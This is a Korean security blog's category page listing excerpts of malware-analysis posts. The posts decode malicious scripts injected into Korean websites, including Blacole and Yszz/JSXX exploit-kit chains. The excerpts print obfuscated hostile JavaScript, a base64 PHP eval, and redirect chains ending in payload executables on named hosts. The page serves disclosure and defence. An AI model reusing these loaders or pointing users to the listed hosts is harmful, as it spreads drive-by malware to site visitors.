본문 바로가기

security/악성코드 유포

Exploit:JS/Blacole.KH (Microsoft) 우연히 해외 사이트를 보던 도중 Exploit 을 보아서 이렇게 써봅니다. 우선은 배치된 코드는 다음과 같습니다. try{bgewg346tr++}catch(aszx){try{dsgdsg-142}catch(dsfsd){try{("".substr+"")()}catch(ehwdsh){try{window.document.body++}catch(gdsgsdg){dbshre=204;}}}} if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;} asgq=new Array (1,2,99,97,28,32,93,105,94,113,101,94,104,111,42,95,94,11.. 더보기
HEX 값으로 유포하는 악성 Iframe Script 발견지 : http://integridesign.com/David/index.php?target=contact* 위 페이지 접속시 악성스크립트에 감염 될 수도 있습니다! 위와같이 사이트 접속시 정상 스크립트 내에 이와같이 알수 없는 문구들로 이어진 스크립트를 발견 할 수 있습니다! 잠깐 확인을 해보자면 이 코드는 간단하다. "var t" 로 지정되어있는 값이 String.fromCharCode 거쳐 eval 함수에서 출력이 된다 !알수 없이 이어진 숫자들은 바로 16진수 HEX 코드이다.HEX 코드를 다시 문자열로 변환하는 방법은 아스키 코드표를 보면 쉽게 스크립트가 어디로 연결 되어 있는지를 볼 수 있다 ! Decode 를 해보면 연결되는 사이트는 다음과 같다 ! document.write('') ==.. 더보기
골칫덩어리! JSXX 0.44 VIP 디코딩 ! http://kids.woorisoop.org/kids/css/kids.js→http://www.marieclairekorea.com/user/pop/pop_photot.html →http://www.rootmand.com/hndex/index.html (JSXX 0.44 VIP) →http://www.rootmand.com/hndex/swfobject.js →http://www.rootmand.com/hndex/jpg.js var XzAWBt8=navigator.userAgent.toLowerCase(); var kuAyQq8="1"+"1"+"1"; if(document.cookie.indexOf("pCRvCM5=")==-1 && XzAWBt8.indexOf("linux") -1){document.wr.. 더보기
음반사이트 → http://www.leesmusic.co.kr (리스뮤직) 악성스크립트 유포중! 발견지 : http://www.leesmusic.co.kr [리스뮤직] →http://www.leesmusic.co.kr/./lees/index.php () →http://www.7iaa.com/index.html (서버죽음) →http://seoul-kla.com/admin/data/webedit/1.htm → http://www.baikec.cn/down/ko.exe(복호화 최종파일) → http://seoul-kla.com/admin/data/webedit/svchsot.exe(스크립트 내 연결 파일) if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");~>user agent의 정보얻은후 .. 더보기
구인 사이트 교차로 → http://www.icross.co.kr Yszz 0.11 vip 악성 스크립트 유포중!! 발견지 : http://www.icross.co.kr [교차로] →http://festival.cocobau.com/adm_site/e_show/e_th_abd.js →http://173.245.86.205/pic/img.js →http://173.245.86.205/pic/img.html (Yszz 1.5 vip) → http://173.245.86.152/img/jpg.css (최종파일) → http://173.245.86.205/pic/swfobject.js → http://173.245.86.205/pic/jpg.js →http://173.245.86.205/pic/css.html http://festival.cocobau.com/adm_site/e_show/e_th_abd.js ---------.. 더보기
중앙정보처리학원 → http://it.choongang.co.kr 악성 스크립트 유포중!! 원본 위치 : http://it.choongang.co.kr/curri/curri_week.asp?m=2 스크립트내에 두가지 스크립트가 존재한다 ! 717a766078707b613b62677c[생략]5b372e eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGxpbmtzID0gbmV3IEdldExpbmtzKCk7DQoNCmVjaG8gJGxpbmtzLT5MaW5rczsNCmNsYXNzIEdldEpbmtzDQp7DQoJdmFyICRob3N0ID0gImVzbGkudHciOw0KCXZhciAk[생략]wYWdlID0gZXhwbG9kZSgiXHJcblxyXG4iLCAkYnVmZik7DQogIAkJCXJldHVybiAkcGFnZVsxXTsNCiAgICB9DQoJfQ0KfQ==.. 더보기
우연히 발견한 악성스크립트 ! 원본 위치 : http://kjclsb.buy3d.co.kr/style.css.js document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%[생략]68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631mbohvbhf[생략]%60vs%264C%261E%261B%264D0tdsjqu%264F1') 디코딩! textarea 태그 이용하는 방법도 괜찮은거 같.. 더보기
Yszz 1.5 vip ! 발견지 : http://www.icross.co.kr/ →http://festival.cocobau.com/adm_site/e_show/e_th_ad.js →http://205.164.25.146/pic/img.js →http://205.164.25.146/pic/img.html (Yszz 1.5 vip) → http://205.164.25.146/pic/swfobject.js → http://205.164.25.146/pic/jpg.js →http://205.164.25.146/pic/css.html var K4Er = "%";var MDIxo=K4Er+"78"+K4Er+"6F";var OIai8=K4Er+"78"+K4Er+"6F"+K4Er+"31";var HHYWv=K4Er+"31"+"%59"+"%5.. 더보기
짱라이브(jjang Live) 특정 페이지내 악성코드 유포중! 감염 페이지 : http://www.jjanglive.com/upload/list.txt 현재 짱라이브 내에 비정상적이 페이지에서 악성코드가 유포중에 있습니다 ! 메인 페이지로 접속할때는 감염이 안되지만 이 특정 링크를 통해 접속 하실 경우 감염이 됨을 알려 드립니다 ! list.txt 내에 현재 코드는 ! 051049058104116116112058047047107111114101097046102111114 103101116109101050046105110102111047116101109112047108103108046103105102 이거 한줄로 되어있습니다. 3개씩 짤라서 아스키코드표와 대조해 본다면 쉽게 찾을 수 있습니다 ! 051,049,058,104,116,116,112,058,047,047,.. 더보기
[Sophos] 9백만 대 이상의 PC 감염 - 제로액세스 봇넷 무방비 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=18600 9백만 대 이상의 PC 감염 - 제로액세스 봇넷 무방비제로액세스(ZeroAccess)는 수년간 개인과 기업들을 괴롭혀온 엄청나게 널리 퍼진 맬웨어입니다. 이 맬웨어는 Windows의 새로운 아키텍쳐나 버전에 맞춰 발전해 왔습니다.소포스랩에서 우리는 더 많은 맬웨어를 다운로드하기 위한 명령을 받을 수 있는 P2P 봇넷을 희생 PC들에게 추가하면서 어떻게 제로액세스가 그 희생 PC들을 예속시키는 지 설명하면서, 제로액세스 루트킷의 이전 화신에 대해 깊이 있게 살펴보았습니다.가장 최근에, 소포스 연구원들은 제로액세스가 완전히 사용자모드 메모리로 작동하면서, 어떻게 전략에 있어.. 더보기